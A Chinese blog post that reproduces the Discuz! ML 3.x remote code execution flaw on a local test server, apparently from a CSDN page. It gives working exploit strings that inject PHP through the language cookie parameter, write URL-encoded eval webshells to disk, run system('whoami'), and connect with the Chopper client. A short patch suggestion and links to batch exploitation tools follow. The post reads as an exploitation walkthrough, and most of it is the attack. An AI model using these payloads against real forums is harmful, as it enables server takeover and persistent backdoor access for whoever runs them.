discuz安装_Discuz! ML RCE漏洞 getshell 复现

本文详细介绍了Discuz! ML的远程代码执行(RCE)漏洞,涉及版本包括V3.2、V3.3和V3.4。通过环境搭建、漏洞复现和getshell过程,展示了如何利用该漏洞执行代码并获取shell。最后提出了修改源码和安装补丁的修复建议。
摘要由CSDN通过智能技术生成

264d867bb8c1edf2f90142797e4ba3c1.gif

Discuz简介

Discuz!ML是一个由CodersClub.org创建的多语言,集成,功能齐全的开源网络平台, 用于构建像“社交网络”这样的互联网社区。影响版本


Discuz! ML V3.2

Discuz! ML V3.3

Discuz! ML V3.4

环境搭建

phpstudy  php-7.2.10-nts Apache

discuz 3.4 源码  官网直接下载:http://discuz.ml/download 之后将源码解压到根目录

漏洞复现

右上角语言标识,随便选择一种语言并抓包

   0857ba2c5641c419b9866cf3ccb0190d.png

将抓到的包发送到repeater模块

将包中的xxxxx_language参数值改为 '.phpinfo().' ,可以看到成功执行了代码,得到了phpinfo信息,如下图:

   6d2e55d5bac78f97e663fee53a0ceee7.png

Getshell

exp:

解码后:

'.file_put_contents('shell.php',urldecode('%3c%3fphp %20eval(%24_%47%45%54%5b%22cmd%22%5d)%3b%3f%3e')).'

解码前:

'. file_put_contents('shell.php',urldecode('')

将包中的xxxxx_language参数值改为解码后的exp,可以看到成功执行了代码,在文件夹中多出了shell.php文件,

如下图

   be93997595ddab9e74eb29ec10022125.png

查看文件upload

   2e743742fa76673b418b01c60fdc74bc.png

url后加shell.php?cmd=system('whoami');

url:http://127.0.0.1/discuz/upload/shell.php?cmd=system('whoami');

直接执行了whoami命令

   bc11b737251cff0f4f4e647b2762e966.png

Exp:

'.file_put_contents('shelll.php',urldecode('%3c%3fphp %20eval(%24_%50%4f%53%54%5b%22a1%22%5d)%3b%3f%3e')).'


原语句:

将包中cookie的xxxxx_language参数值改为exp,可以看到成功执行了代码,在文件夹中多出了shelll.php文件,

如下图

   9cd6d29fa1f7d01aa9e55b276d30f947.png

访问执行shelll.php

   868e5b711e6548ef9caa3540eea2b716.png

执行后使用菜刀连接

http://127.0.0.1/discuz/upload/shelll.php

密码:a1(可自己修改)

   7cfa3e7d4d412cb42836c62009a0582b.png

修复建议

修改source/function/function_core.php 644行为:

/*vot*/ $cachefile = './data/template/'.'sc'.'_'.(defined('STYLEID') ? STYLEID.'_' : '_').$templateid.'_'.str_replace('/', '_', $file).'.tpl.php'

删除可控变量。

或者安装最新补丁。

bfa7ea609ae3c26eb98de632fa7d16ad.png

推荐文章++++

1bfea73b01a0b8c2056249aba69850e1.png

*Discuz ML RCE 漏洞批量检测利用工具

*discuz!ML 3.x代码执行漏洞的利用

*【漏洞预警】Discuz! 任意文件删除漏洞

a069fb8d8229fc6b86faa862672ccca6.png

ac1e80151a694f132dde0891a94f7f3a.gif

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值